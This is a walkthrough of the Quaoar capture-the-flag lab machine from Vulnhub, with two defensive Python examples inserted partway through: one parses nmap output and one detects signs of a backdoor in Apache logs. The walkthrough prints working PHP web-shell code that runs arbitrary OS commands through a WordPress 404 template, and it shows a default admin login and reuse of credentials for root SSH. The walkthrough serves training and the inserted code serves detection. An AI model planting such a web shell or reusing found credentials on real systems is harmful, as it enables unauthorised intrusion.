CTF Walkthrough – Hackfest2016: Quaoar (Vulnhub)

[Image: Quaoar boot screen]

Quaoar is a vulnerable machine created by Viper for the Hackfest 2016 CTF (http://hackfest.ca/), and its author tags it as very easy. He even lists the tools you can use, both in the description and on the boot screen. The machine is available at https://www.vulnhub.com/entry/hackfest2016-quaoar,180/

Right after you boot the machine, you are told the challenge: capture 3 flags by getting a shell, escalating to root and finding a post-exploitation flag. The IP address is also displayed.

Run nmap to find out which services are running on the machine. A number of services were open, including httpd on port 80.

root@Garrison:~# nmap -Pn -p- -sV 192.168.9.130

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-04-19 08:36 IST
Nmap scan report for 192.168.9.130
Host is up (0.00014s latency).
Not shown: 65526 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
53/tcp  open  domain      ISC BIND 9.8.1-P1
80/tcp  open  http        Apache httpd 2.2.22 ((Ubuntu))
110/tcp open  pop3        Dovecot pop3d
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
993/tcp open  ssl/imap    Dovecot imapd
995/tcp open  ssl/pop3    Dovecot pop3d
MAC Address: 00:0C:29:88:81:79 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.88 seconds
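Before moving on to the web server, it is worth turning a scan like the one above into an inventory a defender can act on. The following is an added example (not part of the original walkthrough) that parses the port table of nmap's text output and flags the open services that accept credentials in clear text unless TLS is in front of them. The embedded scan text is a constructed copy of the port table shown above; the set of "cleartext authentication" service names is an assumption used only for triage.

```python
import re
from dataclasses import dataclass

# Constructed sample: the port table from the nmap -sV run shown above.
NMAP_OUTPUT = """\
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
53/tcp  open  domain      ISC BIND 9.8.1-P1
80/tcp  open  http        Apache httpd 2.2.22 ((Ubuntu))
110/tcp open  pop3        Dovecot pop3d
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
993/tcp open  ssl/imap    Dovecot imapd
995/tcp open  ssl/pop3    Dovecot pop3d
MAC Address: 00:0C:29:88:81:79 (VMware)
"""

# One row of nmap's port table: "<port>/<proto>  <state>  <service>  <version...>"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

# Assumed list of services whose logins travel unencrypted when not wrapped in TLS.
CLEARTEXT_AUTH = {"pop3", "imap", "http", "ftp", "telnet"}


@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str


def parse_nmap(text):
    """Return a Service for every port-table row in nmap's normal (text) output."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            port, proto, state, name, version = m.groups()
            services.append(Service(int(port), proto, state, name, version.strip()))
    return services


def open_ports(services):
    """Sorted list of port numbers nmap reported as open."""
    return sorted(s.port for s in services if s.state == "open")


def cleartext_auth_services(services):
    """Open services that take credentials without TLS (nmap names TLS ones 'ssl/...')."""
    return [s for s in services if s.state == "open" and s.name in CLEARTEXT_AUTH]


if __name__ == "__main__":
    found = parse_nmap(NMAP_OUTPUT)
    print("open ports:", open_ports(found))
    for s in cleartext_auth_services(found):
        print(f"cleartext auth on {s.port}/{s.proto}: {s.name} ({s.version})")
```

On the scan above this reports 80, 110 and 143 as cleartext-authentication services, while the ssl/imap and ssl/pop3 entries on 993 and 995 are left alone because nmap already prefixes TLS-wrapped services with `ssl/`.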

Starting with httpd, open a browser, enter the machine's IP address in the address bar and hit enter.

[Image: web welcome page]

The welcome page had nothing except an image hyperlinked to another image, and nothing of interest in the source code. Let's check robots.txt for help.

[Image: robots.txt]

Found /wordpress/ listed as allowed. This might be a WordPress installation, so let's check it as well.

[Image: WordPress setup]

So there is a WordPress site running. Why not try logging in to the admin dashboard with the default username? After all, this is a very easy machine. Go to /wordpress/wp-login.php and try the username:password pair admin:admin.

[Image: WordPress login]

That easy! Yes, we now have the WordPress admin dashboard.

[Image: admin dashboard]

We can now edit the themes' and plugins' source files. Go to Appearance > Editor and select the 404 Template to edit. Add the following code; it lets us execute OS commands on the server.

<form method="post" name="oscmd">
 <input type="text" name="cmd" <?php if (isset($_POST["submit"])){ echo 'value="'.$_POST["cmd"].'"'; } ?> />
 <input type="submit" name="submit" value="Command" />
</form>
<br />
<?php
 error_reporting(E_ALL);
 ini_set('display_errors', 1);
 if (isset($_POST["submit"])){
 system($_POST["cmd"]);
 }
?>

Now open a page that renders the 404 template, like /wordpress/?p=99, a post that does not exist. Running the ls command through the form gives us a listing of the current web directory.
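From the defender's side, the two steps just described leave distinctive traces in the Apache access log: a POST to the dashboard's built-in file editor (the save in Appearance > Editor), followed by POST requests to a URL that WordPress answers with a 404 status, which a normal visitor never sends to a missing post. The following added example (not part of the original walkthrough) parses Apache combined-format log lines and raises an alert for both patterns. The log lines are constructed to match this walkthrough; the theme-editor.php path and the referer format are what WordPress 4.x used, and the idea that a POST returning 404 indicates a backdoored 404 template is this example's own heuristic.

```python
import re
from urllib.parse import urlparse

# Constructed Apache combined-log sample reflecting the activity described above.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Apr/2017:08:40:01 +0000] "POST /wordpress/wp-admin/theme-editor.php HTTP/1.1" 302 - "http://192.168.9.130/wordpress/wp-admin/theme-editor.php?file=404.php&theme=twentysixteen" "Mozilla/5.0"
10.0.0.5 - - [19/Apr/2017:08:41:10 +0000] "POST /wordpress/?p=99 HTTP/1.1" 404 2310 "-" "Mozilla/5.0"
10.0.0.7 - - [19/Apr/2017:08:42:00 +0000] "GET /wordpress/?p=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.7 - - [19/Apr/2017:08:42:05 +0000] "GET /wordpress/?p=99 HTTP/1.1" 404 2310 "-" "Mozilla/5.0"
"""

# Apache "combined" format: client ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Dashboard file editors; saving here rewrites theme/plugin PHP on disk.
EDITOR_PATHS = ("/wp-admin/theme-editor.php", "/wp-admin/plugin-editor.php")


def parse_line(line):
    """Parse one combined-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def classify(entry):
    """Return an alert reason for a suspicious entry, or None for normal traffic."""
    path = urlparse(entry["target"]).path
    if entry["method"] == "POST" and path.endswith(EDITOR_PATHS):
        return "built-in file editor save (theme/plugin source modified from the dashboard)"
    if entry["method"] == "POST" and entry["status"] == 404:
        return "POST to a page that returned 404 (possible backdoored 404 template)"
    return None


def detect(lines):
    """Run classify() over log lines; return (client, method, target, reason) tuples."""
    alerts = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reason = classify(entry)
        if reason:
            alerts.append((entry["client"], entry["method"], entry["target"], reason))
    return alerts


if __name__ == "__main__":
    for client, method, target, reason in detect(SAMPLE_LOG.splitlines()):
        print(f"{client} {method} {target}: {reason}")
```

The GET to ?p=99 that also returned 404 is deliberately not flagged: ordinary broken links produce those, and it is the method, not the status, that makes the second request suspicious. The first alert is the one to prevent outright, since setting DISALLOW_FILE_EDIT in wp-config.php removes the dashboard editor that turned an admin password into code execution.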

[Image: added code worked]

We can cat wp-config.php to see the configuration. Because the file contains characters that the browser renders as HTML, check the page source of the result to read the contents fully.

[Image: wp-config.php contents]

The database user's credentials are there in the source. Sometimes a DBA or developer (if he is the only one working on the box) uses the system user's credentials for the database user as well. What are the chances, then, that these will work for the system user?

Username: root
Password: rootpassword!

As the SSH service is running on the target, try to connect using the above credentials.

[Image: root login with found credentials]

It worked. We now have a shell with root privileges. Let's check what is in the home directory. Ah, a flag.txt file: there we have our first flag.

Let's check what the local user has in its home. Another flag.txt. This is easy.

[Image: flags 1 and 2]

There is also a post-exploitation flag, as mentioned on the boot screen of Quaoar. There are a number of things we generally check post exploitation, and one of them is crontab. After a little surfing through the cron files, we found the third flag in /etc/cron.d/php5.

[Image: post-exploitation flag]

The description of the Quaoar VM is accurate: it really is very easy. Thank you Viper and Vulnhub for the machine.

Leave your comments, queries and suggestions on how I can improve below.
